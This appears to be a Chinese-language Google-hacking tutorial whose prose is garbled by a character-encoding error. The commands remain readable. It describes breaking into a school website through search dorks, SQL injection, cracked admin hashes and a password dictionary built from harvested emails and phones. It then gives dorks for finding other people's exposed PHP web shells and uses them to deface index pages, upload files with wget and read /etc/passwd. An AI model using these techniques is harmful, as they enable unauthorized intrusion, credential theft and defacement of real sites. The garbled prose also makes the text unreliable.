a2·þÎñÆ÷ÓõÄÓ¦¸ÃÊÇIIS£¬ÉÏÃæÓõÄÊÇaspµÄÕûÕ¾³ÌÐò£¬»¹ÓÐÒ»¸öphpµÄÂÛ̳
a3·þÎñÆ÷Ò²ÊÇIIS£¬aspx+asp¡£web³ÌÐò¶¼Ó¦¸ÃÊÇ×Ô¼º¿ª·¢µÄ¡£ÓÐÂÛ̳ÄǾͿ´¿´Äܲ»ÄÜÓö¼ûʲô¹«¹²µÄFTPÕʺÅʲôµÄ£º
site:a2.xxxx.com intext:ftp://*:*
ûÕÒµ½Ê²Ã´ÓмÛÖµµÄ¶«Î÷¡£ÔÙ¿´¿´ÓÐûÓÐÉÏ´«Ò»ÀàµÄ©¶´£º
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
ÔÚa2ÉÏ·¢ÏÖÒ»¸öÉÏ´«ÎļþµÄÒ³Ã棺
http://a2.xxxx.com/sys/uploadfile.asp
ÓÃIE¿´ÁËһϣ¬Ã»È¨ÏÞ·ÃÎÊ¡£ÊÔÊÔ×¢É䣬
site:a2.xxxx.com filetype:asp
µÃµ½N¸öaspÒ³ÃæµÄµØÖ·£¬ÌåÁ¦»î¾ÍÈÃÈí¼þ×ö°É£¬ÕâÌ׳ÌÐòÃ÷ÏÔûÓжÔ×¢Éä×öʲô·À·¶£¬dbownerȨÏÞ£¬ËäÈ»²»¸ßµ«ÒÑ×ãÒÓ£¬back a shell²»Ì«Ï²
»¶£¬¶øÇÒ¿´ÆðÀ´Êý¾Ý¿âµÄ¸öÍ·¾Í²»Ð¡£¬Ö±½Ó°Ñweb¹ÜÀíÔ±µÄÃÜÂ뱩³öÀ´ÔÙ˵£¬MD5¼ÓÃܹý¡£Ò»°ãѧУµÄÕ¾µãµÄÃÜÂ붼±È½ÏÓйæÂÉ£¬Í¨³£¶¼ÊÇÓòÃû+
µç»°Ò»ÀàµÄ±äÐΣ¬ÓÃgoogle¸ã¶¨°É¡£
site:xxxx.com //µÃµ½N¸ö¶þ¼¶ÓòÃû
site:xxxx.com intext:*@xxxx.com //µÃµ½N¸öÓʼþµØÖ·£¬»¹ÓÐÓÊÏäµÄÖ÷È˵ÄÃû×ÖʲôµÄ
site:xxxx.com intext:µç»° //N¸öµç»°
°ÑʲôµÄÐÅÏ¢×ö¸ö×Öµä°É£¬¹ÒÉÏÂýÂýÅÜ¡£¹ýÁËÒ»¶Îʱ¼ä¾ÍÅܳö4¸öÕʺţ¬2¸öÊÇѧÉú»áµÄ£¬1¸ö¹ÜÀíÔ±£¬»¹ÓÐÒ»¸ö¿ÉÄÜÊÇÀÏʦµÄÕʺš£µÇ½ÉÏÈ¥£º
name£ºÍøÕ¾¹ÜÀíÔ±
pass£ºa2xxxx7619 //˵ÁË°É£¬¾ÍÊÇÓòÃû+4¸öÊý×Ö
ÒªÔÙÔõôÌáȨÄǾͲ»ÊôÓÚ±¾ÎÄÌÖÂÛ·ÃÎÊÁË£¬ºÇºÇ£¬µ½´ËΪֹ¡£
Õâ¶Îʱ¼äÔÚ¹úÍâµÄһЩgoogle hackµÄÑо¿Õ¾µã¿´ÁË¿´£¬ÆäʵҲ¶¼²î²»¶àÊÇһЩ»ù±¾Óï·¨µÄÁé»îÔËÓ㬻òÕßÅäºÏij¸ö½Å±¾Â©¶´£¬Ö÷Òª»¹ÊÇ¿¿
¸öÈ˵ÄÁé»î˼ά¡£¹úÍâ¶ÔÓÚgoogle hack·½ÃæµÄ·À·¶Ò²²¢²»ÊǺܶ࣬ËùÒÔ´ó¼Ò»¹Êǵ㵽Ϊֹ£¬²»ÒªÈ¥¸ãÆÆ»µÀ£¬ºÇºÇ¡£¶ÔÓÚһЩÔÚwinÉÏÅÜ
apacheµÄÍø¹ÜÃÇÓ¦¸Ã¶à×¢ÒâÒ»ÏÂÕâ·½Ã棬һ¸öintitle:index of¾Í²î²»¶à¶¼³öÀ´ÁË:)
1.²éÕÒÀûÓÃphp webshell
intitle:"php shell*" "Enable stderr" filetype:php
(×¢: intitle€€ÍøÒ³±êÌâ Enable stderr€€UNIX±ê×¼Êä³öºÍ±ê×¼´íÎóµÄËõдfiletype€€ÎļþÀàÐÍ)¡£ËÑË÷½á¹ûÖУ¬ÄãÄÜÕÒµ½ºÜ¶àÖ±½ÓÔÚ»úÆ÷ÉÏÖ´
ÐÐÃüÁîµÄweb shellÀ´¡£Èç¹ûÕÒµ½µÄPHPSHELL²»»áÀûÓã¬Èç¹ûÄã²»ÊìϤUNIX£¬¿ÉÒÔÖ±½Ó¿´¿´LIST£¬ÕâÀï¾Í²»Ïêϸ˵ÁË£¬ÓкܶàÀûÓüÛÖµ¡£ÒªËµÃ÷
µÄÊÇ£¬ÎÒÃÇÕâÀïËÑË÷³öÀ´µÄһЩ¹úÍâµÄPHPSHELLÉ϶¼ÒªÊ¹ÓÃUNIXÃüÁ¶¼ÊÇsystemµ÷ÓóöÀ´µÄº¯Êý(ÆäʵÓðٶȼ°ÆäËûËÑË÷ÒýÇ涼¿ÉÒÔ£¬Ö»ÊÇÌî
дËÑË÷µÄÄÚÈݲ»Í¬)¡£Õâ¸öPHPWEBSHELLÊÇ¿ÉÒÔÖ±½ÓEcho(Unix³£ÓÃÃüÁî)¡£Ò»¾ä»°¾Í°ÑÊ×Ò³¸ã¶¨ÁË:
echo "ÕÙ»½" > index.jsp
ÏÖÔÚ¿´¿´Ê×Ò³£¬ÒѾ±»ÎÒÃǸijÉ: "ÕÙ»½" ÁË¡£
ÎÒÃÇÒ²¿ÉÒÔÓÃWGETÉÏ´«Ò»¸öÎļþÉÏÈ¥(±ÈÈçÄãÒªÌæ»»µÄÒ¶×Ó°É)¡£È»ºóexecute CommandÊäÈë cat file > index.html or echo "" > file
echo "test" >> file
ÕâÑùÒ»ÌõÌõ´ò³öÀ´£¬Õ¾µãÊ×Ò³¾Í³É¹¦±»Ìæ»»ÁË¡£Í¬ÑùµÄÒ²¿ÉÒÔ
uname -a;cat /etc/passwd
²»¹ýÓеãҪעÒ⣬ÓÐЩWEBSHELL³ÌÐòÓÐÎÊÌ⣬ִÐв»Á˵ģ¬
2.ËÑË÷INCÃô¸ÐÐÅÏ¢
ÔÚgoogleµÄËÑË÷¿òÖÐÌîÈë:
Code:
.org filetype:inc